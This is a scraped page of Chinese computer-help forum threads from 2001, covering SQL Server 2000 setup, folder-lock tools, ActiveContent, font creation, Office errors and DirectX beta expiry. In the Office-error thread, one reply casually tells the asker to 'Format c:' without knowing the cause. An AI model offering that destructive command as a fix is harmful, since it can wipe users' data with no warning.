注册：2001-09-14
 发表于 2001-12-11 16:21:15 按此观看bjSun的个人资料 按此发邮件给bjSun bjSun 的 oicq 是437362,查看 437362 的资料 收藏该主题供以后查看 发送悄悄话给bjSun 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bjSun的IP
1、请问SQL Server 2000能在什么系统下安装？
Windows 98、Windows NT、Windows Me、Windows 2000 Server、Windows 2000 Professional、Windows 2000 Advanced Server、UNIX、Linux

2、我的机器有SQL Server 7.0，在安装SQL Server 2000之前，应该先卸载SQL Server 7.0吧？可是我的SQL Server 7.0里有很多有用的数据，怎么办？

Sun
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-11 17:09:11 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
Windows 2000 Server Windows 2000 Advanced Server Windows NT 下能完全安装 其它windows只有能安装桌面用应用版`

SQL Server 2000 可以在SQL Server 7.0 上面升级~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-12-11 23:05:27 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
yunbin在上个帖子中说
引用:
Windows 2000 Server Windows 2000 Advanced Server Windows NT 下能完全安装 其它windows只有能安装桌面用应用版`

SQL Server 2000 可以在SQL Server 7.0 上面升级~

我的WIN2K专业版本能装么

我前几天买了四张盘的SQL，里面有企业版和标准版还有个人版与开发版！

请问这几个版本能分别装在那些系统里面？还有对系统的硬件配置有啥关系，请指教

^^
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-12 09:54:50 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
软硬兼施在上个帖子中说
引用:
yunbin在上个帖子中说
引用:
Windows 2000 Server Windows 2000 Advanced Server Windows NT 下能完全安装 其它windows只有能安装桌面用应用版`

SQL Server 2000 可以在SQL Server 7.0 上面升级~

我的WIN2K专业版本能装么

我前几天买了四张盘的SQL，里面有企业版和标准版还有个人版与开发版！

请问这几个版本能分别装在那些系统里面？还有对系统的硬件配置有啥关系，请指教

你说的个人专业版的应该就是桌面版~ 你的系统如果是Windows 2000 Professional 只能安装这个版的SQL Server 其它版本要在Windows 2000 Server 系列里面能全部安装~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 | 主题：请教SQL Server 2000的安装
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


有谁能推荐一个好用的给文件夹加锁的软件？

计算机技术
有谁能推荐一个好用的给文件夹加锁的软件？

上一贴 | 下一贴
发表人 | 主题: 有谁能推荐一个好用的给文件夹加锁的软件？
菜菜子 肥皂泡泡 积分：3383 发帖：1620 来自：肥皂泡泡的世界 注册：2000-08-10 | 发表于 2001-12-07 18:28:50 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 收藏该主题供以后查看 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP 如题。 :: 落霞与孤骛齐飞，秋水共长天一色。:: --熙宁街43号-- Blueidea Counter Strike Team =Blueidea=Caicaizi
flyingbird 想飞的心 积分：4546 发帖：1672 来自： 注册：1999-12-22 | 发表于 2001-12-07 18:36:54 按此观看flyingbird的个人资料 按此发邮件给flyingbird 发送悄悄话给flyingbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看flyingbird的IP window 2000的NTFS可以加密。 行者无疆 Blueidea Web Team Team member
菜菜子 肥皂泡泡 积分：3383 发帖：1620 来自：肥皂泡泡的世界 注册：2000-08-10 | 发表于 2001-12-07 22:01:34 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP 可我的2000 是FAT32的，不想换成NTFS :: 落霞与孤骛齐飞，秋水共长天一色。:: --熙宁街43号-- Blueidea Counter Strike Team =Blueidea=Caicaizi
lzrone 初级用户 积分：107 发帖：51 来自： 注册：2001-03-18 | 发表于 2001-12-08 01:28:38 按此观看lzrone的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给lzrone 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lzrone的IP PMT（渗透1.0）可以将多个文件保存于一个24位的BMP文件中，并允许用户进行权限设置，这样，不知情的人只能看到一幅正常的BMP图片 **************************** 星空依旧灿烂
菜菜子 肥皂泡泡 积分：3383 发帖：1620 来自：肥皂泡泡的世界 注册：2000-08-10 | 发表于 2001-12-08 10:00:51 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP 我只想给文件夹加个锁，原来好像看过类似软件的，忘了 :: 落霞与孤骛齐飞，秋水共长天一色。:: --熙宁街43号-- Blueidea Counter Strike Team =Blueidea=Caicaizi
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2001-12-08 13:29:13 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 网盾~ A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
珞珞 高级用户 积分：166 发帖：50 来自：shanghai 注册：2000-07-25 | 发表于 2001-12-10 11:54:15 按此观看珞珞的个人资料 按此发邮件给珞珞 珞珞 的 oicq 是2204032,查看 2204032 的资料 发送悄悄话给珞珞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看珞珞的IP 我刚刚下载了一个密码大师5.0，是加密的，好像挺好用的， 开心就好！
小诺 替补版主 积分：6499 发帖：3746 来自：Shanghai 注册：2000-09-16 | 发表于 2001-12-10 12:57:40 按此观看小诺的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给小诺 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小诺的IP click here
上一贴 | 下一贴
快速回复 | 主题：有谁能推荐一个好用的给文件夹加锁的软件？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


JJX的那个ActiveContent是个什么东东？

计算机技术
JJX的那个ActiveContent是个什么东东？

上一贴 | 下一贴
发表人 主题: JJX的那个ActiveContent是个什么东东？
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-12-10 17:54:13 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 收藏该主题供以后查看 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
想了解一下

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

CrazyParty

群山之巅
积分：2164
发帖：811
来自：温州
注册：2000-10-14
 发表于 2001-12-11 12:56:29 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
是个基于模板的信息反布平台，应该是静态，只是经典这里是.asp，上次听蓝色说是和广告条有关

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
donger

SmallOgre
积分：5913
发帖：3342
来自：
注册：2000-07-22
 发表于 2001-12-11 13:04:22 按此观看donger的个人资料 按此发邮件给donger 访问donger的主页 发送悄悄话给donger 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看donger的IP
是一个功能强大的内容发布系统，经典除了论坛外的其他内容都是由内容系统自动产生的HTML页面。
目前和广告条无关

Enough is as good as a feast.

Blueidea Web Team

菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-12-11 15:05:12 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
那如果发布对象是以产品图片为主，用AC能否实现？
还有就是能否实现 关键词 查询产品？

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

CrazyParty

群山之巅
积分：2164
发帖：811
来自：温州
注册：2000-10-14
 发表于 2001-12-11 15:13:29 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
我觉的内容发布系统更适合文字类的站点，用作产品图片站点好象有点大材小用。

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-12-11 16:09:19 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
也就是说AC能够胜任罗？

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

donger

SmallOgre
积分：5913
发帖：3342
来自：
注册：2000-07-22
 发表于 2001-12-11 16:13:40 按此观看donger的个人资料 按此发邮件给donger 访问donger的主页 发送悄悄话给donger 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看donger的IP
以前艺设区有很多图片，在内容系统中
显示起来很方便

Enough is as good as a feast.

Blueidea Web Team

梦觉

贫僧法号梦……
积分：3936
发帖：1688
来自：
注册：2000-01-11
 发表于 2001-12-11 16:17:16 按此观看梦觉的个人资料 按此发邮件给梦觉 发送悄悄话给梦觉 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看梦觉的IP
这类问题可以直接和JJX联系，开发者最清楚了，我们只是产品的使用者，不可能很了解了。
详细情况： http://www.cnscript.com/

[这消息被梦觉编辑过(编辑时间2001-12-11 16:18:00)]

静而安，安而虑，虑而得。

Blueidea Web Team
Team member

菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-12-11 18:23:01 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
梦觉在上个帖子中说
引用:
这类问题可以直接和JJX联系，开发者最清楚了，我们只是产品的使用者，不可能很了解了。
详细情况： http://www.cnscript.com/

就是因为给JJX发了邮件但没有回音，所以才......

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

jjx

管理员 | hi 你好
积分：1342
发帖：694
来自：浙江余姚
注册：1999-12-16
 发表于 2001-12-11 18:42:04 按此观看jjx的个人资料 按此发邮件给jjx 访问jjx的主页 发送悄悄话给jjx 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jjx的IP
菜菜子在上个帖子中说
引用:
梦觉在上个帖子中说
引用:
这类问题可以直接和JJX联系，开发者最清楚了，我们只是产品的使用者，不可能很了解了。
详细情况： http://www.cnscript.com/

就是因为给JJX发了邮件但没有回音，所以才......

给我发邮件了吗？我没有收到啊

如CrazyParty 所言，如果仅仅发布产品图片，用activecontent成本过高了，一些asp代码+access就可以了。activecontent功能主要是对站点栏目，文件的统一管理，模板是其管理页面的一种重要手段而已

菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-12-11 21:36:00 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
jjx在上个帖子中说
引用:
菜菜子在上个帖子中说
引用:
梦觉在上个帖子中说
引用:
这类问题可以直接和JJX联系，开发者最清楚了，我们只是产品的使用者，不可能很了解了。
详细情况： http://www.cnscript.com/

就是因为给JJX发了邮件但没有回音，所以才......

给我发邮件了吗？我没有收到啊

如CrazyParty 所言，如果仅仅发布产品图片，用activecontent成本过高了，一些asp代码+access就可以了。activecontent功能主要是对站点栏目，文件的统一管理，模板是其管理页面的一种重要手段而已

JJX你终于现身了 [image] ，我的邮件是发到 jiangjianxiao@163.net这个邮箱的， 你再去看看？

当然不仅仅是用来发布图片，而且还有文字等内容。并且想了解一下发布以后是不是还可以通过AC实现产品的按关键字检索，比如像新浪商城那种模式。 让客户能够很快的在站中查询到所感兴趣的产品，包括照片等资料。

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

jjx

管理员 | hi 你好
积分：1342
发帖：694
来自：浙江余姚
注册：1999-12-16
 发表于 2001-12-11 21:46:45 按此观看jjx的个人资料 按此发邮件给jjx 访问jjx的主页 发送悄悄话给jjx 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jjx的IP
菜菜子在上个帖子中说
引用:

JJX你终于现身了 [image] ，我的邮件是发到 jiangjianxiao@163.net这个邮箱的， 你再去看看？

当然不仅仅是用来发布图片，而且还有文字等内容。并且想了解一下发布以后是不是还可以通过AC实现产品的按关键字检索，比如像新浪商城那种模式。 让客户能够很快的在站中查询到所感兴趣的产品，包括照片等资料。

支持全文本检索，支持你所讲的那种检索

邮件没有收到，呵呵，发jjx@cnscript.com 看看

上一贴 | 下一贴
快速回复 | 主题：JJX的那个ActiveContent是个什么东东？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


ＳＯＳ！找造字程序

计算机技术
ＳＯＳ！找造字程序

上一贴 | 下一贴
发表人 | 主题: ＳＯＳ！找造字程序
蓝星 初级用户 积分：56 发帖：22 来自：北京 注册：2000-10-26 | 发表于 2001-12-11 15:56:55 按此观看蓝星的个人资料 按此发邮件给蓝星 蓝星 的 oicq 是32828394,查看 32828394 的资料 收藏该主题供以后查看 发送悄悄话给蓝星 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝星的IP 最好是能把造好的字放在光盘上带走的，多谢 请大家多多指教
bxlzbtpap 高级用户 积分：259 发帖：67 来自： 注册：2001-11-09 | 发表于 2001-12-11 17:59:42 按此观看bxlzbtpap的个人资料 按此发邮件给bxlzbtpap 发送悄悄话给bxlzbtpap 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bxlzbtpap的IP 现在的字够多的了，你还要造什么字？你是搞古汉语的吗？
蓝星 初级用户 积分：56 发帖：22 来自：北京 注册：2000-10-26 | 发表于 2001-12-12 10:10:14 按此观看蓝星的个人资料 按此发邮件给蓝星 蓝星 的 oicq 是32828394,查看 32828394 的资料 发送悄悄话给蓝星 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝星的IP 正是呀，主要是出一本古代的书，上面很多的字字库没有，郁闷 请大家多多指教
嘿嘿 坏笑 积分：403 发帖：524 来自： 注册：2001-10-06 | 发表于 2001-12-12 14:31:33 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP http://www.newhua.com/FontCreatorProgram.htm Font Creator Program 可用来制作字体(TTF)的程序，除可自行制作外也能够直接编辑修改视窗操作系统上的任何TrueType字体，制作好的字体或修改好的字体能够让你储存和使用。 缘是天定,份在人为.
蓝星 初级用户 积分：56 发帖：22 来自：北京 注册：2000-10-26 | 发表于 2001-12-13 10:11:33 按此观看蓝星的个人资料 按此发邮件给蓝星 蓝星 的 oicq 是32828394,查看 32828394 的资料 发送悄悄话给蓝星 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝星的IP 多谢，我现在去down,看一看效果如何 请大家多多指教
上一贴 | 下一贴
快速回复 | 主题：ＳＯＳ！找造字程序
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


安装office出现的错误提示？

计算机技术
安装office出现的错误提示？

上一贴 | 下一贴
发表人 主题: 安装office出现的错误提示？
ajiao

终级用户
积分：544
发帖：172
来自：0412
注册：2001-03-14
 发表于 2001-12-14 15:52:08 按此观看ajiao的个人资料 按此发邮件给ajiao ajiao 的 oicq 是870922,查看 870922 的资料 收藏该主题供以后查看 发送悄悄话给ajiao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ajiao的IP

装的window me系统，以前word 莫名其妙的就不好用了，找不到windowme来覆盖，卸载后想装office2000但是装不上，提示2906，后来想装入officexp，又提示如上图这个错误，是系统的什么问题么？还是什么原因，能帮我找找看么？谢谢哦。

到底有没有无需置疑的事情呢？
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-12-15 23:40:49 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
换个office试试

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-12-15 23:57:01 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
我过去也曾经出现过这样的情况
这是由于windows内部出现了问题
具体什么问题我不知道
但此时即使覆盖安装Windows也没用

Format c:吧

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
上一贴 | 下一贴
快速回复 | 主题：安装office出现的错误提示？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


Office XP 后遗症-_-

计算机技术
Office XP 后遗症-_-

上一贴 | 下一贴
发表人 | 主题: Office XP 后遗症-_-
Hotter 初级用户 积分：27 发帖：9 来自： 注册：2001-12-12 | 发表于 2001-12-14 18:42:46 按此观看Hotter的个人资料 按此发邮件给Hotter 访问Hotter的主页 Hotter 的 oicq 是30360630,查看 30360630 的资料 收藏该主题供以后查看 发送悄悄话给Hotter 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Hotter的IP 安装了Office以后会在控制面板里面出现一个文字服务，真是太烦了-_- 因为在我用输入法的时候不能显示输入法状态。。。请问那位朋友知道如何恢复到以前的 样子？ 8da.HotTeR http://wWw.8da.CoM.cN http://Sc.8da.cOm.Cn
hellslayer 初级用户 积分：20 发帖：251 来自：不能上网的学校 注册：2001-04-04 | 发表于 2001-12-15 23:39:25 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP 在控制面板里的输入法选择添加 "我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
赵鹏 初级用户 积分：9 发帖：1191 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-15 23:56:34 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 如果你是使用Win2000+微软拼音的话 很不幸 输入法状态栏已经无法独立出现了 除非你选择“在桌面上显示语言栏” 并且在系统托盘区点击EN或CH选择“显示语言栏” 此时微软拼音输入法状态栏才可以显示 但这样做即使不用中文输入法了 也会有一个小图标留在屏幕上 很烦 解决的办法是 1 使用其他输入法 2 升级为Windows XP或者降级为9x、Me 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
上一贴 | 下一贴
快速回复 | 主题：Office XP 后遗症-_-
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


求救，如何将mp3转成rm 格式？

计算机技术
求救，如何将mp3转成rm 格式？

上一贴 | 下一贴
发表人 | 主题: 求救，如何将mp3转成rm 格式？
desgin 终级用户 积分：1042 发帖：500 来自：江西-南昌 注册：2001-02-26 | 发表于 2001-12-17 15:25:49 按此观看desgin的个人资料 按此发邮件给desgin 访问desgin的主页 desgin 的 oicq 是2620533,查看 2620533 的资料 收藏该主题供以后查看 发送悄悄话给desgin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看desgin的IP 求救，如何将mp3转成rm 格式？ 用什么软件，那里下栽，谢谢 =blueidea.tk=
POPOEVER N个蓝色大泡泡 版主 积分：19175 发帖：5030 来自：Keyframe G.L 注册：2000-07-17 | 发表于 2001-12-17 16:12:08 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP RealProducer 8.5 到处都有~~~ XTree 无可救药地活着，睡眼朦胧地醒着 Blueidea Web Team Moderator Of DW & JS Forum Chief Police Officer
上一贴 | 下一贴
快速回复 | 主题：求救，如何将mp3转成rm 格式？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


有谁愿意全面的帮助我一回???

计算机技术
有谁愿意全面的帮助我一回???

上一贴 | 下一贴
发表人 主题: 有谁愿意全面的帮助我一回???
Violet

初级用户
积分：0
发帖：1
来自：四川
注册：2001-12-06
 发表于 2001-12-16 21:50:19 按此观看Violet的个人资料 按此发邮件给Violet Violet 的 oicq 是22808860,查看 22808860 的资料 收藏该主题供以后查看 发送悄悄话给Violet 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Violet的IP
大侠：
最近，我启动多媒体程序和上网打开IE时，都会出现：

This pre-release version of DirectX has expired, please upgade to the
latest version from http://www,microsoft.com/directx
和
Beta DirectDraw Expired, please update，

在WINME下，我刚装的是DirectX8.1.
以为是版本低嘛，我又用卸载工具将它卸下来重装，但还是不行，一样的提示还
是出现字眼前，但是点一下确定（或两下，三下）一切都正常了，只是每次听歌
和打开网页时很不方便，有什么好的方法可以解决吗？拜托了！！！
(我用的不是试用版,麻烦你们把具体的方法告诉我,我毕竟是个菜鸟!)
Violet

天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-12-16 22:03:04 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
哈哈，你装的DIRECTX是从《电脑迷》里装的吗？
意思是软件已经到期了，因为它是BETA版的，就是实验版，只要去下在一个正式版或把这个删掉装一个以前的正式版都能解决

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
上一贴 | 下一贴
快速回复 | 主题：有谁愿意全面的帮助我一回???
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


vb上面怎么安装mdsn Library？

计算机技术
vb上面怎么安装mdsn Library？

上一贴 | 下一贴
发表人 主题: vb上面怎么安装mdsn Library？
sgilb

高级用户
积分：187
发帖：76
来自：
注册：2001-09-16
 发表于 2001-12-18 21:33:40 按此观看sgilb的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给sgilb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sgilb的IP
vb上面怎么安装mdsn Library？
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-19 08:28:40 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
sgilb在上个帖子中说
引用:
vb上面怎么安装mdsn Library？

vb ?? 上面安装msdn

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

八神奄

超级用户
积分：304
发帖：102
来自：沈阳市
注册：2001-05-26
 发表于 2001-12-19 12:59:33 按此观看八神奄的个人资料 按此发邮件给八神奄 访问八神奄的主页 八神奄 的 oicq 是13730452,查看 13730452 的资料 发送悄悄话给八神奄 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看八神奄的IP
Msdn盘不是针对哪儿个程序安装的

它是微软公司 单独发行的 。

它本身有安装文件，是装在你的系统当中的，这样在微软其它程序在需要调用它的时侯

会自动检测msdn是否己被安装的。

不一定哪一天， 我做了一件事 然后把自己吓了一跳。 呵呵 小坏蛋。。。
欢迎光临我的网站－＞ 一个年轻的不级格的程序员
Http://www.ioriwellings.tk
Http://www.iori.wellings.com
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2001-12-19 14:31:56 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
MSDN是其实是一个超大的CHM文件

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

sunnyleo

高级用户
积分：183
发帖：217
来自：大连
注册：2001-05-13
